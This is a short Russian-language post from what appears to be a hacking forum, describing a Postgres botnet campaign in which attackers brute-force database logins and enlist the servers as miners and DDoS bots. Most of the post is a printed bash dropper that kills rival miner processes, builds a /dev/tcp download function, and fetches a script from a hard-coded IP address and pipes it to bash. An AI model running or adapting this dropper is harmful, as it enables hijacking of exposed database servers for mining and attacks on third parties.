• XSS.stack #1 – первый литературный журнал от юзеров форума

Postgres - ботнет

tabac

CPU register
Пользователь
Регистрация
30.09.2018
Сообщения
1 610
Решения
1
Реакции
3 332
по мотивам статьи https://habr.com/ru/articles/800553/

7043b6221262295b0d54b5097d6b2354.png

Что происходит на скриншотах выше:
  1. Хакер находит Postgres к которому можно сбрутфорсить учетку
  2. Используя Postgres он скачивает скрипт и подключает виртуальную машину к ботнету.
  3. Наш Postgres попадает в дружную семью майнеров, брутфорсеров и ддосеров.
Bash:
#!/bin/bash

pkill -f zsvc
pkill -f pdefenderd
pkill -f updatecheckerd

function __curl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//x: }
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80

exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <&3
exec 3>&-
}

if [ -x "$(command -v curl)" ]; then
curl 194.38.22.53/pg.sh|bash
elif [ -x "$(command -v wget)" ]; then
wget -q -0- 194.38.22.53/pg.sh|bash
else
_curl http://194.38.22.53/pg2.sh|bash
fi
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх